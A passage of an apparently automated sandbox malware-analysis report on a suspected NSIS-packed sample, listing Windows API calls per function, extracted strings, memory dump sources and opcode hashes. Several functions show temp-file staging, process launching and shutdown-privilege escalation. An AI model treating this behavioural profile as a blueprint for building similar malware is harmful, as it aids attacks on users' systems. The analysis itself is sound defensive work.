                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                          • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                          • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                          • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                          • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-2145255484
                                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                          • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                          • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                          APIs
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405D76
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405E1E
                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00405E2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: 0_B
                                                          • API String ID: 3248276644-2128305573
                                                          • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                          • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                          • CloseHandle.KERNEL32(?), ref: 00405A07
                                                          Strings
                                                          • Error launching installer, xrefs: 004059E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D2EE0,00403A1A,774D3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                          • GlobalFree.KERNEL32(?), ref: 00403A64
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-2145255484
                                                          • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                          • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6EAB116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB11C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB11D9
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 4dd609deac0a3997217db941bfa419140d204792efc96997b1d9733504e4ff1d
                                                          • Instruction ID: ad741d80a4b64573d8638e0332e2e84a544554977c1e3b6fcf67891a60ba0fea
                                                          • Opcode Fuzzy Hash: 4dd609deac0a3997217db941bfa419140d204792efc96997b1d9733504e4ff1d
                                                          • Instruction Fuzzy Hash: 5E31B2B2900202DFDB008FE8E944A7677EDEF26310B15852DE844EB224E734DD8A8768
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                          • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$$q
                                                          • API String ID: 0-855381642
                                                          • Opcode ID: e7e14365cc7b1f19c89ae7e5d7d2656c95588372c045ce65f30947d03a837f25
                                                          • Instruction ID: f3a3c1bd251a8c5e7855ababd71b77c811b38624d0a73b487ce71d002cbbf781
                                                          • Opcode Fuzzy Hash: e7e14365cc7b1f19c89ae7e5d7d2656c95588372c045ce65f30947d03a837f25
                                                          • Instruction Fuzzy Hash: 1FF16D34E04348DFDB08DFB9D8546AEBBB2BF89300B148529E416A73A4DF359D12CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq$Xq$Xq
                                                          • API String ID: 0-3965792415
                                                          • Opcode ID: c4c4d8764dae8a5ffa1ebb1fcc3f3c955b2ea4109bb09461159c811314fcc75f
                                                          • Instruction ID: 70243d5c91d7d533545fb7c8f8ee030775eed91e635dcf77e8eefcdeea66ed0f
                                                          • Opcode Fuzzy Hash: c4c4d8764dae8a5ffa1ebb1fcc3f3c955b2ea4109bb09461159c811314fcc75f
                                                          • Instruction Fuzzy Hash: F3520B1961D3D2AFDB224B305CFB9D5BFA05E0314576D0ACEE0C1664A3DA9A87A9C313
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4(\3L(\3$@*\3$LRq$d"\3
                                                          • API String ID: 0-2175920938
                                                          • Opcode ID: 52cb7a4b23194d4432d42256b597e560f9035b3114925e363228d08d46929420
                                                          • Instruction ID: 29a664f9bcf34dd86af36ed74f202cb9a4d689fcb2e344f3ff86ac31f527bd50
                                                          • Opcode Fuzzy Hash: 52cb7a4b23194d4432d42256b597e560f9035b3114925e363228d08d46929420
                                                          • Instruction Fuzzy Hash: C2A1D474E00609CFDF04DFA8D984A9DBBB2FF89701B108229E406AB365DB746D46CF95
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq
                                                          • API String ID: 0-1556399337
                                                          • Opcode ID: 681aea3e95b62d3d04d0188476981f132b7d01995156ecf2f8075cbc4d4d6626
                                                          • Instruction ID: 23f73deddea2677413064a2d32d25dde92c53475610f00138fd2fd1b100b116d
                                                          • Opcode Fuzzy Hash: 681aea3e95b62d3d04d0188476981f132b7d01995156ecf2f8075cbc4d4d6626
                                                          • Instruction Fuzzy Hash: 3C414831B04B248BDF2D4BB58C943BEAAA6BFC5350F28403ED842C7691DBB48C949761
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f613924426661e5566a5062310725d8a556241f6e085dca54f3e199d9a580df5
                                                          • Instruction ID: 8380eeb2ca07cc93cde33c37081fe99ce6d375eedb7e35726d2996e0d0f180c7
                                                          • Opcode Fuzzy Hash: f613924426661e5566a5062310725d8a556241f6e085dca54f3e199d9a580df5
                                                          • Instruction Fuzzy Hash: 57210531D0020AAFCB15DF78C8505EE7B74FF96360F158267E914AB244EB30AA59CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f72116d8728237f90dd2d1c2a1154c992159daf8046983e9fd8ad143f56d08f
                                                          • Instruction ID: 39884a803cc13f794faab1e66f3f27301d94edd9537ce6e3992cf1a5ff384c81
                                                          • Opcode Fuzzy Hash: 6f72116d8728237f90dd2d1c2a1154c992159daf8046983e9fd8ad143f56d08f
                                                          • Instruction Fuzzy Hash: 6821C131E00205AFCB14DB68C8509BE3BA5FF98360B14C129E9199B250DB30EE0ACBC1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ed9c195bf720ef1948e4a7f391aa7991bcaf81a045fdfc03fe11e47d64a44e8
                                                          • Instruction ID: 7c314dc53c4ebfb874a83be1ea12717ac77b2e1ff5bdff283f8dd77a4441bda4
                                                          • Opcode Fuzzy Hash: 1ed9c195bf720ef1948e4a7f391aa7991bcaf81a045fdfc03fe11e47d64a44e8
                                                          • Instruction Fuzzy Hash: BB317F78E01308DFCB48DFA8D59499DBBB2FF49701B614069E81AAB364DB35AD41CF41
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 892cf4be8f46f812074154bbca1dbbb8aa410f4d753782614731db90cace5a62
                                                          • Instruction ID: c56ed69e02fb7d37ce5c569233d23fe97cd4a7576ae3effcdd11969cde695a69
                                                          • Opcode Fuzzy Hash: 892cf4be8f46f812074154bbca1dbbb8aa410f4d753782614731db90cace5a62
                                                          • Instruction Fuzzy Hash: B72120B0C052098FCB01DFA8D8446EEBFF4FF4A300F0441AAD405B7261EB345A95CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fc58a559d81275ab2efb3bd2b10ddc22ce72bbaf82d08263964785833d663a7
                                                          • Instruction ID: 5173bff55ec8661dcf84086ce029f384702e65dc4f64c9eecc6a0c168bdb71ed
                                                          • Opcode Fuzzy Hash: 3fc58a559d81275ab2efb3bd2b10ddc22ce72bbaf82d08263964785833d663a7
                                                          • Instruction Fuzzy Hash: 76D01231D2032A978B10A6A5DC044EEBB38EE95221B504626D51437144EB70665986A1
                                                          APIs
                                                          • SetErrorMode.KERNEL32 ref: 004034C8
                                                          • GetVersion.KERNEL32 ref: 004034CE
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                          • OleInitialize.OLE32(00000000), ref: 00403545
                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                          • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                          • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                          • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                          • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                          • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                          • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                          • ExitProcess.KERNEL32 ref: 0040383A
                                                          • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                          • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                          • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                          • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                          • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                          • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                          • ExitProcess.KERNEL32 ref: 004039E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 3441113951-334447862
                                                          • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                          • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                          • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                          • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                          • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
